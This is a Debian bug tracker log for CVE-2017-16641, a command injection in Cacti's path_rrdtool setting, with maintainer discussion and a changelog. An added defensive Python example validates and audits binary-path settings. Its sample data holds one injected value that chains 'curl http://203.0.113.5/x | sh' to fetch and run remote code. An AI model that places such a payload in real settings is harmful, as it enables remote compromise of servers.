Debian Bug report logs -
#881110
cacti: CVE-2017-16641: arbitrary execution of os commands via path_rrdtool parameter in an action=save request
Reported by: Salvatore Bonaccorso <carnil@debian.org>
Date: Tue, 7 Nov 2017 21:21:05 UTC
Severity: important
Tags: fixed-upstream, patch, security, upstream
Found in versions cacti/0.8.8a+dfsg-5+deb7u10, cacti/0.8.8a+dfsg-5, cacti/1.1.27+ds1-2
Fixed in version cacti/1.1.27+ds1-3
Done: Paul Gevers <elbrus@debian.org>
Bug is archived. No further changes may be made.
Forwarded to https://github.com/Cacti/cacti/issues/1057
Report forwarded to debian-bugs-dist@lists.debian.org, carnil@debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Cacti Maintainer <pkg-cacti-maint@lists.alioth.debian.org>: Bug#881110; Package src:cacti. (Tue, 07 Nov 2017 21:21:07 GMT)
Acknowledgement sent to Salvatore Bonaccorso <carnil@debian.org>: New Bug report received and forwarded. Copy sent to carnil@debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Cacti Maintainer <pkg-cacti-maint@lists.alioth.debian.org>. (Tue, 07 Nov 2017 21:21:07 GMT)
Message #5 received at submit@bugs.debian.org:
Source: cacti
Version: 1.1.27+ds1-2
Severity: grave
Tags: patch security upstream
Forwarded: https://github.com/Cacti/cacti/issues/1057
Hi,
the following vulnerability was published for cacti.
CVE-2017-16641[0]:
| lib/rrd.php in Cacti 1.1.27 allows remote authenticated administrators
| to execute arbitrary OS commands via the path_rrdtool parameter in an
| action=save request to settings.php.
If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
For further information see:
[0] https://security-tracker.debian.org/tracker/CVE-2017-16641
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16641
[1] https://github.com/Cacti/cacti/issues/1057
Please adjust the affected versions in the BTS as needed, only did
check unstable's version for now source-wise.
Regards,
Salvatore
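The description above is terse about the mechanism: an administrator saves a setting through settings.php (action=save) that names the rrdtool binary, and that stored value later reaches a shell, so anything after a `;` or `|` in it runs as the web server user. The block below is an added example, not Cacti's own code and not the upstream fix from issue #1057. It shows the bug class (a binary-path setting concatenated into a shell string) next to the two controls a practitioner would want: a validator for such a setting and an argv-style invocation that never touches a shell, plus an audit over stored path_* settings for a post-incident check. The helper names (unsafe_command_string, validate_binary_path, build_rrdtool_argv, audit_settings), the allow-listed directories, the idea that other Cacti path settings share the path_ prefix, and the sample settings rows are all assumptions constructed for this example.

```python
"""
Added example for the CVE-2017-16641 bug class (not Cacti's code and not the
upstream fix): an admin-editable "path to a binary" setting such as
path_rrdtool is interpolated into a shell command line. Helper names, the
allow-listed directories and the sample settings rows are assumptions made
up for this example.
"""
from __future__ import annotations

import os

# Characters that turn a "path" into a second command once it is dropped
# into a shell string (separators, redirections, expansions, quoting, blanks).
SHELL_META = set(";|&`$(){}<>*?[]\"'\\ \t\n\r")

# Directories a monitoring host's rrdtool/php/snmp binaries are expected in
# (assumption; tighten to the packages actually installed).
ALLOWED_DIRS = ("/usr/bin", "/usr/local/bin", "/bin")


def unsafe_command_string(path_rrdtool: str, *args: str) -> str:
    """The vulnerable pattern: the stored setting concatenated into a shell
    string. Returned, never executed, to show why ';' or '|' in the value is
    enough to run arbitrary commands as the web server user."""
    return path_rrdtool + " " + " ".join(args)


def validate_binary_path(value: str, allowed_dirs=ALLOWED_DIRS,
                         must_exist: bool = True) -> tuple[bool, str]:
    """Return (ok, reason). Accept only an absolute, normalized,
    metacharacter-free path under an allow-listed directory; with
    must_exist=True it must also name an existing executable regular file."""
    if not value.startswith("/"):
        return False, "path is not absolute"
    if any(ch in SHELL_META for ch in value):
        return False, "path contains shell metacharacters or whitespace"
    if os.path.normpath(value) != value:
        return False, "path is not normalized ('..', './' or repeated '/')"
    if not any(value.startswith(d.rstrip("/") + "/") for d in allowed_dirs):
        return False, "path is outside the allow-listed directories"
    if must_exist and not (os.path.isfile(value) and os.access(value, os.X_OK)):
        return False, "path is not an existing executable regular file"
    return True, "ok"


def build_rrdtool_argv(path_rrdtool: str, *args: str,
                       must_exist: bool = True) -> list[str]:
    """Hardened counterpart: validate the setting, then return an argv list.
    subprocess.run(argv) with a list never goes through a shell, so even a
    value that slipped past validation cannot chain a second command."""
    ok, reason = validate_binary_path(path_rrdtool, must_exist=must_exist)
    if not ok:
        raise ValueError(f"refusing path_rrdtool {path_rrdtool!r}: {reason}")
    return [path_rrdtool, *args]


def audit_settings(rows, must_exist: bool = False) -> list[dict]:
    """Post-incident check over (name, value) rows, e.g. from a query like
    SELECT name, value FROM settings WHERE name LIKE 'path_%' (assumed
    schema). Returns the rows whose value would not pass validate_binary_path()."""
    findings = []
    for name, value in rows:
        ok, reason = validate_binary_path(value, must_exist=must_exist)
        if not ok:
            findings.append({"name": name, "value": value, "reason": reason})
    return findings


# Constructed sample rows (not from any real Cacti database). The third one
# is what an abused path_rrdtool setting looks like.
SAMPLE_SETTINGS = [
    ("path_php_binary", "/usr/bin/php"),
    ("path_snmpwalk", "/tmp/snmpwalk"),
    ("path_rrdtool", "/usr/bin/rrdtool; curl http://203.0.113.5/x | sh"),
    ("path_spine", "spine"),
]

if __name__ == "__main__":
    print(unsafe_command_string(SAMPLE_SETTINGS[2][1], "-"))
    for finding in audit_settings(SAMPLE_SETTINGS):
        print(f"{finding['name']}: {finding['value']!r} -> {finding['reason']}")
    print(build_rrdtool_argv("/usr/bin/rrdtool", "info", "/var/lib/cacti/rra/x.rrd",
                             must_exist=False))
```

The validator is deliberately stricter than "is it a file": an administrator who can point the setting at any executable on disk still has the command execution Paul Gevers describes later in this log, so the allow-list of directories is what actually narrows the power of the setting, and the argv list removes the shell from the path entirely. The audit function is the check to run against a stored settings table after a suspected compromise, since the injected value persists there long after the saving request has rotated out of the access logs.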
Information forwarded to debian-bugs-dist@lists.debian.org, Cacti Maintainer <pkg-cacti-maint@lists.alioth.debian.org>: Bug#881110; Package src:cacti. (Fri, 10 Nov 2017 18:51:03 GMT)
Acknowledgement sent to Paul Gevers <elbrus@debian.org>: Extra info received and forwarded to list. Copy sent to Cacti Maintainer <pkg-cacti-maint@lists.alioth.debian.org>. (Fri, 10 Nov 2017 18:51:03 GMT)
Message #10 received at 881110@bugs.debian.org:
Control: found 881110 0.8.8a+dfsg-5+deb7u10
On 07-11-17 22:17, Salvatore Bonaccorso wrote:
> Please adjust the affected versions in the BTS as needed, only did
> check unstable's version for now source-wise.
All versions in Debian are affected.
Unfortunately the upstream commit contains many unneeded changes to fix
the issue. Additionally, for pre-buster fixes, the code in settings.php
is seriously different.
Paul
Marked as found in versions cacti/0.8.8a+dfsg-5+deb7u10. Request was from Paul Gevers <elbrus@debian.org> to 881110-submit@bugs.debian.org. (Fri, 10 Nov 2017 18:51:03 GMT)
Marked as found in versions cacti/0.8.8a+dfsg-5. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Fri, 10 Nov 2017 19:33:03 GMT)
Information forwarded to debian-bugs-dist@lists.debian.org, Cacti Maintainer <pkg-cacti-maint@lists.alioth.debian.org>: Bug#881110; Package src:cacti. (Fri, 10 Nov 2017 20:30:06 GMT)
Acknowledgement sent to Paul Gevers <elbrus@debian.org>: Extra info received and forwarded to list. Copy sent to Cacti Maintainer <pkg-cacti-maint@lists.alioth.debian.org>. (Fri, 10 Nov 2017 20:30:06 GMT)
Message #19 received at 881110@bugs.debian.org:
Control: severity -1 important
Control: tags -1 pending
Hi all,
On 07-11-17 22:17, Salvatore Bonaccorso wrote:
> Severity: grave
> CVE-2017-16641[0]:
> | lib/rrd.php in Cacti 1.1.27 allows remote authenticated administrators
> | to execute arbitrary OS commands via the path_rrdtool parameter in an
> | action=save request to settings.php.
Although this is true, and this parameter is not meant to be used like
this, the cacti *admin* has always had this possibility via the "Data
Input Method" freedom, which caused CVE-2009-4112 / bug 561339 to be
raised. I just confirmed that I could indeed still do this via that
(trivial) route.
So just to be clear (and I don't particularly like it), the power of the
cacti *admin* has been long known and has been accepted as unfixed for
multiple Debian releases. Therefore I lower the severity of this bug.
Unfortunately the upstream patch for this bug does not simply apply to
pre 1.x versions of cacti. I am not comfortable (yet) with creating a
patch for those versions, and due to CVE-2009-4112, I don't think it is
worth fixing this in stable and older.
Paul
PS One other option is to raise the severity of 561339 again, but I don't
expect the patch to then miraculously turn up.
Severity set to 'important' from 'grave'. Request was from Paul Gevers <elbrus@debian.org> to 881110-submit@bugs.debian.org. (Fri, 10 Nov 2017 20:30:06 GMT)
Added tag(s) pending. Request was from Paul Gevers <elbrus@debian.org> to 881110-submit@bugs.debian.org. (Fri, 10 Nov 2017 20:30:06 GMT)
Added tag(s) fixed-upstream. Request was from bts-link-upstream@lists.alioth.debian.org to control@bugs.debian.org. (Mon, 13 Nov 2017 17:36:32 GMT)
Reply sent to Paul Gevers <elbrus@debian.org>: You have taken responsibility. (Tue, 14 Nov 2017 20:51:06 GMT)
Notification sent to Salvatore Bonaccorso <carnil@debian.org>: Bug acknowledged by developer. (Tue, 14 Nov 2017 20:51:06 GMT)
Message #30 received at 881110-close@bugs.debian.org:
Source: cacti
Source-Version: 1.1.27+ds1-3
We believe that the bug you reported is fixed in the latest version of
cacti, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 881110@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Paul Gevers <elbrus@debian.org> (supplier of updated cacti package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Format: 1.8
Date: Tue, 14 Nov 2017 20:14:34 +0100
Source: cacti
Binary: cacti
Architecture: source
Version: 1.1.27+ds1-3
Distribution: unstable
Urgency: medium
Maintainer: Cacti Maintainer <pkg-cacti-maint@lists.alioth.debian.org>
Changed-By: Paul Gevers <elbrus@debian.org>
Description:
cacti - web interface for graphing of monitoring systems
Closes: 881110
Changes:
cacti (1.1.27+ds1-3) unstable; urgency=medium
.
* CVE-2017-16641: remote authenticated administrators can execute
arbitrary os commands via the path_rrdtool parameter in an action=save
request to settings.php (Closes: #881110)
* CVE-2017-16660: remote authenticated administrators can conduct Remote
Code Execution attacks by placing the Log Path under the web root, and
then making a remote_agent.php request containing PHP code in a
Client-ip header
* CVE-2017-16661: remote authenticated administrators can read arbitrary
files accessible by the web-server user by placing the Log Path into a
private directory, and then making a clog.php?filename= request
* CVE-2017-16785: reflected XSS via the PATH_INFO to host.php
(reintroduction of CVE-2017-15194)
* Bump standards to 4.1.1
* Set Priority to optional
Checksums-Sha1:
6da0c05e6b24552f8e3f4c0d995152531237f5e1 2134 cacti_1.1.27+ds1-3.dsc
e0d1f509fb465f2c1676b254fc0d5b1362e9f7f5 56092 cacti_1.1.27+ds1-3.debian.tar.xz
Checksums-Sha256:
9d77784c2545398d29f325c99764b1aebeb8966bb7d12e5c0dda78e7673306f3 2134 cacti_1.1.27+ds1-3.dsc
519db95eb5fd254f309faad31aaeb2d79fa1b2bbe8a8c604aa8b8fdcc7203f44 56092 cacti_1.1.27+ds1-3.debian.tar.xz
Files:
2f7335b2759d8227a2b170074abf98de 2134 web optional cacti_1.1.27+ds1-3.dsc
fd6375c1fc789d1654364421b949f5ac 56092 web optional cacti_1.1.27+ds1-3.debian.tar.xz
-----BEGIN PGP SIGNATURE-----
iQEzBAEBCAAdFiEEWLZtSHNr6TsFLeZynFyZ6wW9dQoFAloLTQwACgkQnFyZ6wW9
dQpdEQgArlYK+cTh43PDHWpBbVGsg2TSH6vkIPQXUbM10uTcKHvgbd+vF83tYoh4
PQ+KHUImJhDc0Kd6bVfk9TixKG0KAm3FQ4sMleNCtQugoDKeR1qPadEbXlZB1GNp
AqgAUvYfWWPF1u4bi/ZCB+WJULOeiU8J2WNCa64ppbSUpQLy2JD9kHaRuypYw3YQ
8KkC0eY7dTsaDzpjkQOYjZLXKiivvTRDh4oUYJ88mPJDcXIziC2a6in4lWUcQyho
/fker79akY1cL6KDKoOdff8iq86V1h9WD9aLWetZu/SEw96ysWHHvu0fmM9IJmHa
uEs97E9RHMxHHnsik8P970Z1cxUwag==
=x3y5
-----END PGP SIGNATURE-----
Information forwarded to debian-bugs-dist@lists.debian.org, Cacti Maintainer <pkg-cacti-maint@lists.alioth.debian.org>: Bug#881110; Package src:cacti. (Mon, 20 Nov 2017 20:33:03 GMT)
Acknowledgement sent to Salvatore Bonaccorso <carnil@debian.org>: Extra info received and forwarded to list. Copy sent to Cacti Maintainer <pkg-cacti-maint@lists.alioth.debian.org>. (Mon, 20 Nov 2017 20:33:03 GMT)
Message #35 received at 881110@bugs.debian.org:
Hi Paul,
Sorry for the delayed reply.
On Fri, Nov 10, 2017 at 09:26:17PM +0100, Paul Gevers wrote:
> Control: severity -1 important
> Control: tags -1 pending
>
> Hi all,
>
> On 07-11-17 22:17, Salvatore Bonaccorso wrote:
> > Severity: grave
> > CVE-2017-16641[0]:
> > | lib/rrd.php in Cacti 1.1.27 allows remote authenticated administrators
> > | to execute arbitrary OS commands via the path_rrdtool parameter in an
> > | action=save request to settings.php.
>
> Although this is true, and this parameter is not meant to be used like
> this, the cacti *admin* has always had this possibility via the "Data
> Input Method" freedom, which caused CVE-2009-4112 / bug 561339 to be
> raised. I just confirmed that I could indeed still do this via that
> (trivial) route.
>
> So just to be clear (and I don't particularly like it), the power of the
> cacti *admin* has been long known and has been accepted as unfixed for
> multiple Debian releases. Therefore I lower the severity of this bug.
>
> Unfortunately the upstream patch for this bug does not simply apply to
> pre 1.x versions of cacti. I am not comfortable (yet) with creating a
> patch for those versions, and due to CVE-2009-4112, I don't think it is
> worth fixing this in stable and older.
Ok! Your argument makes sense to me, and I went ahead to mark the
issue as no-dsa for stretch and jessie. Still, if upstream provides
help in addressing any of those two issues, it would be great to see fixes
at some point, e.g. via a point release or picked up in a DSA as well.
Regards,
Salvatore
Information forwarded to debian-bugs-dist@lists.debian.org, Cacti Maintainer <pkg-cacti-maint@lists.alioth.debian.org>: Bug#881110; Package src:cacti. (Mon, 20 Nov 2017 21:12:03 GMT)
Acknowledgement sent to Paul Gevers <elbrus@debian.org>: Extra info received and forwarded to list. Copy sent to Cacti Maintainer <pkg-cacti-maint@lists.alioth.debian.org>. (Mon, 20 Nov 2017 21:12:03 GMT)
Message #40 received at 881110@bugs.debian.org:
Hi Salvatore,
On 20-11-17 21:30, Salvatore Bonaccorso wrote:
> Sorry for the delayed reply.
NP.
> Ok! Your arguing makes sense to me, and I went ahead to mark the
> issue as no-dsa for stretch and jessie.
Thanks.
> Still, if upstream provides
> help in addressing any of those two issues, it would be great to see fixes
> at some point, e.g. via a point release or picked up in a DSA as well.
Sure, will do. I am hoping that upstream will provide a patch for
CVE-2009-4112 in a reasonable time from now. Upstream has really stepped
up since the preparation of 1.x started and they were getting closer to
actually releasing it. If/once that happens, I'll make sure I'll
backport both that patch and the one for this issue, but then it is
worth the effort in my opinion.
Paul
Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Tue, 03 Apr 2018 07:26:21 GMT)
Debian bug tracking system administrator <owner@bugs.debian.org>.
Last modified: Wed Jun 19 18:48:02 2019; Machine Name: buxtehude
Debian Bug tracking system
Debbugs is free software and licensed under the terms of the GNU
Public License version 2. The current version can be obtained
from https://bugs.debian.org/debbugs-source/.
Copyright © 1999 Darren O. Benham,
1997,2003 nCipher Corporation Ltd,
1994-97 Ian Jackson,
2005-2017 Don Armstrong, and many other contributors.